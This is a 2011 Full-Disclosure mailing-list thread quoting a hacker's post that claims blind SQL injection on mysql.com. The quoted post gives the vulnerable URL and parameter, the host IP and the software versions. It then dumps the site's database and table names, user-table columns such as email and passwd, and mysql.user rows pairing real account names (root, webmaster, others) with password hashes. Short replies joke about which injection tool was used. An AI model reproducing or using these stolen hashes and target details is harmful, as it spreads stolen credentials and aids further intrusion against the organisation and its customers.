pangolin or havij? lol
On Sun, Mar 27, 2011 at 8:54 AM, Cal Leeming <[email protected]> wrote: > lmao. > > Was this accomplished using standard pattern from sqlmap, or did you make > your own? > > On Sun, Mar 27, 2011 at 6:46 AM, Jack haxor <[email protected]> wrote: > >> >> >> --------------------------------------------------------------------------------------- >> [+] MySQL.com Vulnerable To Blind SQL Injection vulnerability >> [+] Author: Jackh4xor @ w4ck1ng >> [+] Site: http://www.jackh4xor.com >> >> --------------------------------------------------------------------------------------- >> >> About MySQL.com : >> >> -------------------------------------------------------------------------------------------------------------------- >> >> The Mysql website offers database software, services and support for your >> business, including the Enterprise server, the Network monitoring and >> advisory services and the production support. The wide range of products >> include: Mysql clusters, embedded database, drivers for JDBC, ODBC and Net, >> visual database tools (query browser, migration toolkit) and last but not >> least the MaxDB- the open source database certified for SAP/R3. The Mysql >> services are also made available for you. Choose among the Mysql training >> for database solutions, Mysql certification for the Developers and DBAs, >> Mysql consulting and support. It makes no difference if you are new in the >> database technology or a skilled developer of DBA, Mysql proposes services >> of all sorts for their customers. >> >> -------------------------------------------------------------------------------------------------------------------- >> >> >> >> Vulnerable Target : http://mysql.com/customers/view/index.html?id=1170 >> Host IP : 213.136.52.29 >> Web Server : Apache/2.2.15 (Fedora) >> Powered-by : PHP/5.2.13 >> Injection Type : MySQL Blind >> Current DB : web >> >> Data Bases: >> >> information_schema >> bk >> certification >> c?ashme >> cust_sync_interim >> customer >> dbasavings >> downloads >> feedback >> glassfish_interface >> intranet >> kaj >> license_customers >> manual >> manual_search >> mem >> mysql >> mysqlforge >> mysqlweb >> news_events >> partner_t?aining >> partners >> partners_bak >> phorum5 >> planetmysql >> qa_contribution >> quickpoll >> robin >> rp >> sampo >> sampo_interface >> sessions >> softrax >> softrax_interim >> solutions >> tco >> test >> track >> track_refer >> wb >> web >> web_control >> web_projects >> web_training >> webwiki >> wordpress >> zack >> >> Current DB: web >> >> Tables >> >> xing_validation >> v_web_submissions >> userbk >> user_extra >> >> user Columns: cwpid version lead_quality sfid industry address2 created >> last_modified lang notify newsletter gid title fax cell phone country >> zipcode state city address business company position lastname firstname >> passwd verified bounces email user_id >> >> us_zip_state >> us_area_state >> unsub_log >> trials >> trial_external_log >> trial_data >> trial_alias >> training_redirect >> tag_blacklist >> tag_applied >> tag >> support_feeds_DROP >> support_entries_DROP >> states >> snapshots_builds >> snapshots >> sakilapoints >> regions >> quote_customer >> quote >> quicklinks >> promo >> product_releases >> position >> partner >> paper_lead >> paper_details_options >> paper_details_old >> paper_details >> paper >> newsletter_unsub >> nav_sites >> nav_items >> mysql_history >> mirror_status >> mirror_country >> mirror_continent >> mirror >> mailing_list_member >> mailing_list >> locks >> lead_validity_rules >> lead_source_xref >> lead_source_external >> lead_source >> lead_routing_rule >> lead_rep >> lead_old >> lead_note >> lead_extra_old >> lead_extra_new >> lead_extra >> lead_companies >> lead_campaign_member >> lead >> language_strings >> language_modules >> imagecache >> hall_of_fame >> g_search_term >> g_search_data >> g_blog_data >> forum_comment >> forms >> field_xref >> field_options >> field_match >> email_blacklist >> email_a_friend >> drpl_manual_review >> drpl_denied >> drpl_check_log >> drpl_cache >> customer_meta_sets >> customer_meta_set >> customer_meta >> customer >> coupon_product >> coupon_campaign_attribute >> coupon_campaign >> coupon >> country >> countries >> campaign_type >> campaign_topic >> campaign_score >> campaign_listdata >> campaign_detail >> business >> bounces >> >> Database : mysql >> Table: >> >> user_info >> >> user Column: Update_pri Insert_priv Select_priv Password User Host >> >> time_zone_transition_type >> time_zone_transition >> time_zone_name >> time_zone_leap_second >> time_zone >> tables_priv >> slow_log >> ?ervers >> procs_priv >> proc >> plugin >> ndb_binlog_index >> inventory >> host >> help_topic >> help_relation >> help_keyword >> help_category >> general_log >> func >> event >> db >> columns_priv >> >> >> # mysql.user Data >> >> Password User Host >> wembaster % >> monitor 10.% >> sys % >> sys localhost >> *06581D0A5474DFF4D5DA3CE0CD7702FA52601412 forumread % >> *0702AEBF8E92A002E95D40247776E1A67CD2CA3F wb % >> *2A57F767D29295B3CB8D01C760D9939649483F85 flipper 10.% >> *32F623705BFFFE682E7BD18D5357B38EF8A5BAA9 wordpress % >> *66A905D4110DF14B41D585FDBCE0666AD13DD8C1 nagios % >> *704EB56151317F27573BB4DDA98EDF00FFABAAF8 root localhost >> *ED1BDC19B08FD41017EE180169E5CEB2C77F941A mysqlforge % >> *FD75B177FFEC3590FE5D7E8459B3DDC60AE8147B webleads 10.% >> 00680dd718880337 olof % >> 077f61a849269b62 qa_r % >> 077f61a849269b62 qa_rw % >> 077f61a849269b62 qa_adm % >> 0c2f46ba6b87d4ea trials_admin 10.% >> 1856b9b03b5a6f47 cacti % >> 19519e95545509b5 certification % >> 1a39dcad63bbc7a6 gf_mschiff % >> 2277fd7d562ec459 webslave localhost >> 2277fd7d562ec459 webslave % >> 304404b114b5516c planetmysql_rw % >> 35e376451a87adb0 planetmysql_ro % >> 4e203d581b756a93 webmaster localhost >> 4e203d581b756a93 webmaster % >> 4e93479179a8ec93 sysadm % >> 575ec47e16c7e20e phorum5 % >> 575ec47e16c7e20e lenz % >> 5f340ec40a706f64 robin % >> 61113da02d2c97a5 regdata % >> 616075f256f111ba myadmin 10.100.6.44 >> 61711eea3de509ac merlin 127.0.0.1 >> 6302de0909a369a1 ebraswell % >> 6b72b2824cc7f6fe mysqlweb % >> 6ffd2b17498cdd44 zack % >> 70599cf351c6f591 repl % >> 740284817e3ed5a8 webwiki % >> 74c5529b41a97cc2 web_projects >> >> Databsae: web_control >> >> Table: >> system >> system_command >> service_request >> run_control >> request_daemon >> rebuild_server >> rebuild_queue >> rebuild_control >> quarterly_lead_report >> newsletter_log >> newsletter_control >> ips >> hosts Columns:notes description name >> dns_servers Columns: name internal ip >> >> >> Database: certification >> >> Tables: >> signup >> corpcustomers >> certexamdata >> certcandidatedata >> certaccess >> >> >> Database: wordpress >> >> Tables: >> >> wp_4_term_taxonom >> wp_4_term_relationships >> wp_4_posts >> wp_4_postmeta >> wp_4_options >> wp_4_links >> wp_4_comments >> wp_3_terms >> wp_3_term_taxonomy >> wp_3_term_relationships >> wp_3_posts >> wp_3_postmeta >> wp_3_options >> wp_3_links >> wp_3_comments >> wp_2_terms >> wp_2_term_taxonomy >> wp_2_term_relationships >> wp_2_posts >> wp_2_postmeta >> wp_2_options >> wp_2_links >> wp_2_comments >> wp_1_terms >> wp_1_term_taxonomy >> wp_1_term_relationships >> wp_1_posts >> wp_1_postmeta >> wp_1_options >> wp_1_links >> wp_1_comments >> wp_11_terms >> wp_11_term_taxonomy >> wp_11_term_relationships >> wp_11_posts >> wp_11_postmeta >> wp_11_options >> wp_11_links >> wp_11_comments >> wp_10_terms >> wp_10_term_taxonomy >> wp_10_term_relationships >> wp_10_posts >> wp_10_postmeta >> wp_10_options >> wp_10_links >> wp_10_comments >> remove_queries >> >> >> >> Database: bk >> >> Table: >> wp_backupterm_taxonomy >> wp_backupterm_relationships >> wp_backupposts >> wp_backuppostmeta >> wp_backupoptions >> wp_backuplinks >> wp_backupcomments >> >> >> >> ----------------------------------------------------------------------------------- >> Signed : Jackh4xor ! [image: Smile] >> >> Greetz : rooto, Mr.52, zone-hacker, w4ck1ng >> >> (In)Security >> >> ------------------------------------------------------------------------------------- >> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
